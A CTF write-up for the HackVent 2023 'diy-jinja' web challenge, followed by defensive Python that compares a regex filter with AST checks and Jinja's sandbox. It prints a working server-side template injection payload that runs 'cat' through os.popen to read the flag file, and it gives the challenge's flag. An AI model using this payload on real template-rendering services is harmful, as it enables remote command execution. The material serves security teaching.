HackVent 2023 - [HV23.10] diy-jinja
Difficulty: Medium
Category: Web Security
Author: coderion
We’ve heard you like to create your own forms. With SANTA (Secure and New Template Automation), you can upload your own jinja templates and have the convenience of HTML input fields to have your friends fill them out! Obviously 100% secure and even with anti-tampering protection!
This challenge actually had two unintended solutions (regex bypass and abusing the description field for labels); the intended solution was to just use {% %} tags for flow control instead of {{}}:
{% for char in request.application.__globals__.__builtins__.__import__('os').popen('cat /app/flag.txt').read() %}
{{ char }}
{% endfor %}
The flag is: HV23{us3r_suppl13d_j1nj4_1s_4lw4ys_4_g00d_1d34}
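The gap from the defender's side, as an added example that is not the challenge's source code: `expression_only_filter` is an assumption about the kind of check that inspects only {{ }} bodies, and `REQUEST`, `SECRET` and `UPLOAD` are constructed stand-ins. It compares that check with a walk over Jinja's parsed AST, which covers every tag type, and with rendering in `SandboxedEnvironment`.

```python
import re
from types import SimpleNamespace

from jinja2 import Environment, nodes
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

SECRET = "constructed-secret"  # module global, reachable through __globals__


def application():
    """Stand-in for Flask's request.application (any Python function works)."""


REQUEST = SimpleNamespace(application=application)

# Constructed upload: the dunder access sits in a {% %} tag, as in the write-up.
UPLOAD = ("{% for v in [request.application.__globals__.SECRET] %}"
          "{{ v }}{% endfor %}")


def expression_only_filter(src):
    """ASSUMED weak check: accepts the upload unless '__' appears inside {{ ... }}."""
    bodies = re.findall(r"\{\{(.*?)\}\}", src, re.S)
    return not any("__" in body for body in bodies)


def ast_violations(src):
    """Parse the template and list underscore-prefixed attribute/item lookups.

    A pre-check only (it does not cover e.g. the |attr filter); the sandbox
    below is the actual control.
    """
    found = []
    tree = Environment().parse(src)
    for node in tree.find_all((nodes.Getattr, nodes.Getitem)):
        if isinstance(node, nodes.Getattr):
            name = node.attr
        else:
            name = getattr(node.arg, "value", None)  # only constant subscripts
        if isinstance(name, str) and name.startswith("_"):
            found.append(name)
    return found


def render(env, src):
    """Render with the given environment; report sandbox refusals as text."""
    try:
        return env.from_string(src).render(request=REQUEST)
    except SecurityError as exc:
        return f"blocked: {exc}"
```
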